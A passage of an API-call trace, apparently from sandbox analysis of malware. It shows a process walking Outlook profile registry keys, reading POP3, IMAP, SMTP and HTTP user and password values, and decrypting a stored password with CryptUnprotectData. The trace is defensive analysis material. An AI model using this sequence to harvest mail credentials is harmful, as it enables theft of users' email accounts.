pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.922] GetProcessHeap () returned 0x620000 [0064.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.923] GetProcessHeap () returned 0x620000 [0064.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.923] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.923] GetProcessHeap () returned 0x620000 [0064.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.924] GetProcessHeap () returned 0x620000 [0064.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.925] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.925] GetProcessHeap () returned 0x620000 [0064.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.925] GetProcessHeap () returned 0x620000 [0064.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.926] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.926] GetProcessHeap () returned 0x620000 [0064.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.926] GetProcessHeap () returned 0x620000 [0064.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.927] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.927] GetProcessHeap () returned 0x620000 [0064.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.927] GetProcessHeap () returned 0x620000 [0064.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.928] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Server URL", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.928] GetProcessHeap () returned 0x620000 [0064.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.929] GetProcessHeap () returned 0x620000 [0064.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.929] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.929] GetProcessHeap () returned 0x620000 [0064.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.930] GetProcessHeap () returned 0x620000 [0064.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c6e8 [0064.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.930] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Server", pdwReserved=0x0, pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x63c6e8, pcbData=0x19f6b8*=0x208) returned 0x2 [0064.930] GetProcessHeap () returned 0x620000 [0064.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c6e8 | out: hHeap=0x620000) returned 1 [0064.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.933] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0064.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.936] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0064.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.939] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0064.939] GetProcessHeap () returned 0x620000 [0064.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0064.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.940] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.940] GetProcessHeap () returned 0x620000 [0064.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.941] GetProcessHeap () returned 0x620000 [0064.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0064.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.942] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.942] GetProcessHeap () returned 0x620000 [0064.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.942] GetProcessHeap () returned 0x620000 [0064.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.943] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.943] GetProcessHeap () returned 0x620000 [0064.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.943] GetProcessHeap () returned 0x620000 [0064.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.944] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.944] GetProcessHeap () returned 0x620000 [0064.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.944] GetProcessHeap () returned 0x620000 [0064.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.945] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.945] GetProcessHeap () returned 0x620000 [0064.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.945] GetProcessHeap () returned 0x620000 [0064.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.946] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x3, pvData=0x63a6e0*, pcbData=0x19f6b4*=0x121) returned 0x0 [0064.946] LoadLibraryW (lpLibFileName="CRYPT32") returned 0x75090000 [0064.967] CryptUnprotectData (in: pDataIn=0x19f6ac, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19f6b4 | out: ppszDataDescr=0x0, pDataOut=0x19f6b4) returned 1 [0064.974] GetProcessHeap () returned 0x620000 [0064.974] LocalFree (hMem=0x62d250) returned 0x0 [0064.975] GetProcessHeap () returned 0x620000 [0064.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0064.975] GetProcessHeap () returned 0x620000 [0064.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.975] GetProcessHeap () returned 0x620000 [0064.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0064.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.975] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.975] GetProcessHeap () returned 0x620000 [0064.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.976] GetProcessHeap () returned 0x620000 [0064.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0064.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.977] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.977] GetProcessHeap () returned 0x620000 [0064.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.977] GetProcessHeap () returned 0x620000 [0064.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0064.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.978] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.978] GetProcessHeap () returned 0x620000 [0064.978] GetProcessHeap () returned 0x620000 [0064.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0064.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.979] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x63a6e0, pcbData=0x19f6b4*=0x208) returned 0x2 [0064.979] GetProcessHeap () returned 0x620000 [0064.979] GetProcessHeap () returned 0x620000 [0064.979] GetProcessHeap () returned 0x620000 [0064.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0064.979] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.980] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0064.980] GetProcessHeap () returned 0x620000 [0064.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc6) returned 0x62e5a0 [0064.980] GetProcessHeap () returned 0x620000 [0064.980] GetProcessHeap () returned 0x620000 [0064.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b640 [0064.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.984] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x63b640 | out: phkResult=0x63b640*=0x22c) returned 0x0 [0064.984] GetProcessHeap () returned 0x620000 [0064.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c2d0 [0064.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.985] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x63c2d0, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0064.985] GetProcessHeap () returned 0x620000 [0064.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c2d0 | out: hHeap=0x620000) returned 1 [0064.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.987] RegCloseKey (hKey=0x22c) returned 0x0 [0064.987] GetProcessHeap () returned 0x620000 [0064.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b640 | out: hHeap=0x620000) returned 1 [0064.987] GetProcessHeap () returned 0x620000 [0064.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62e5a0 | out: hHeap=0x620000) returned 1 [0064.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.988] RegCloseKey (hKey=0x21c) returned 0x0 [0064.988] GetProcessHeap () returned 0x620000 [0064.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0064.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.989] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x2, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="00000003", pcchName=0x19fb4c) returned 0x0 [0064.989] GetProcessHeap () returned 0x620000 [0064.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b660 [0064.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.990] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000003", phkResult=0x63b660 | out: phkResult=0x63b660*=0x21c) returned 0x0 [0064.990] GetProcessHeap () returned 0x620000 [0064.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c2d0 [0064.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.991] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63c2d0, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x63c2d0, pcbData=0x19f6c0*=0x208) returned 0x2 [0064.991] GetProcessHeap () returned 0x620000 [0064.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c2d0 | out: hHeap=0x620000) returned 1 [0064.991] GetProcessHeap () returned 0x620000 [0064.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0064.992] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.992] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0064.992] GetProcessHeap () returned 0x620000 [0064.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc6) returned 0x62d8a0 [0064.992] GetProcessHeap () returned 0x620000 [0064.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0064.993] GetProcessHeap () returned 0x620000 [0064.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5f0 [0064.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.994] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x63b5f0 | out: phkResult=0x63b5f0*=0x22c) returned 0x0 [0064.994] GetProcessHeap () returned 0x620000 [0064.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63c2d0 [0064.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.995] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x63c2d0, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0064.995] GetProcessHeap () returned 0x620000 [0064.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c2d0 | out: hHeap=0x620000) returned 1 [0064.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.997] RegCloseKey (hKey=0x22c) returned 0x0 [0064.997] GetProcessHeap () returned 0x620000 [0064.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5f0 | out: hHeap=0x620000) returned 1 [0064.997] GetProcessHeap () returned 0x620000 [0064.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d8a0 | out: hHeap=0x620000) returned 1 [0064.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.998] RegCloseKey (hKey=0x21c) returned 0x0 [0064.998] GetProcessHeap () returned 0x620000 [0064.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b660 | out: hHeap=0x620000) returned 1 [0064.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.999] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x3, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.999] GetProcessHeap () returned 0x620000 [0064.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.000] RegCloseKey (hKey=0x204) returned 0x0 [0065.000] GetProcessHeap () returned 0x620000 [0065.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b560 | out: hHeap=0x620000) returned 1 [0065.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.002] RegCloseKey (hKey=0x210) returned 0x0 [0065.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b680 | out: hHeap=0x620000) returned 1 [0065.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.003] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xa, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="dc48e7c6d33441458035ee20beefe18a", pcchName=0x19fb7c) returned 0x0 [0065.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5a0 [0065.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.004] RegOpenKeyW (in: hKey=0x218, lpSubKey="dc48e7c6d33441458035ee20beefe18a", phkResult=0x63b5a0 | out: phkResult=0x63b5a0*=0x210) returned 0x0 [0065.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0065.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.004] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0065.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.006] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.006] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a") returned 88 [0065.006] GetProcessHeap () returned 0x620000 [0065.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0065.006] GetProcessHeap () returned 0x620000 [0065.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.007] GetProcessHeap () returned 0x620000 [0065.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0065.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.008] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x63b550 | out: phkResult=0x63b550*=0x204) returned 0x0 [0065.008] GetProcessHeap () returned 0x620000 [0065.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0065.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.009] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0065.009] GetProcessHeap () returned 0x620000 [0065.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.011] RegCloseKey (hKey=0x204) returned 0x0 [0065.011] GetProcessHeap () returned 0x620000 [0065.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0065.011] GetProcessHeap () returned 0x620000 [0065.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.013] RegCloseKey (hKey=0x210) returned 0x0 [0065.013] GetProcessHeap () returned 0x620000 [0065.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5a0 | out: hHeap=0x620000) returned 1 [0065.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.014] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xb, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="e57f6d0b27b6134693ca7113a4ab34a6", pcchName=0x19fb7c) returned 0x0 [0065.014] GetProcessHeap () returned 0x620000 [0065.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0065.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.015] RegOpenKeyW (in: hKey=0x218, lpSubKey="e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x63b670 | out: phkResult=0x63b670*=0x210) returned 0x0 [0065.015] GetProcessHeap () returned 0x620000 [0065.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0065.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.016] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0065.016] GetProcessHeap () returned 0x620000 [0065.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.016] GetProcessHeap () returned 0x620000 [0065.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.017] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.018] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6") returned 88 [0065.018] GetProcessHeap () returned 0x620000 [0065.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0065.018] GetProcessHeap () returned 0x620000 [0065.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.018] GetProcessHeap () returned 0x620000 [0065.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b510 [0065.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.020] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x63b510 | out: phkResult=0x63b510*=0x204) returned 0x0 [0065.020] GetProcessHeap () returned 0x620000 [0065.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0065.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.021] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0065.021] GetProcessHeap () returned 0x620000 [0065.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.022] RegCloseKey (hKey=0x204) returned 0x0 [0065.022] GetProcessHeap () returned 0x620000 [0065.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b510 | out: hHeap=0x620000) returned 1 [0065.022] GetProcessHeap () returned 0x620000 [0065.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.024] RegCloseKey (hKey=0x210) returned 0x0 [0065.024] GetProcessHeap () returned 0x620000 [0065.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0065.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.025] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xc, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="f35c115766b7c94cb080da6869ae8f9d", pcchName=0x19fb7c) returned 0x0 [0065.025] GetProcessHeap () returned 0x620000 [0065.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5b0 [0065.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.026] RegOpenKeyW (in: hKey=0x218, lpSubKey="f35c115766b7c94cb080da6869ae8f9d", phkResult=0x63b5b0 | out: phkResult=0x63b5b0*=0x210) returned 0x0 [0065.026] GetProcessHeap () returned 0x620000 [0065.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 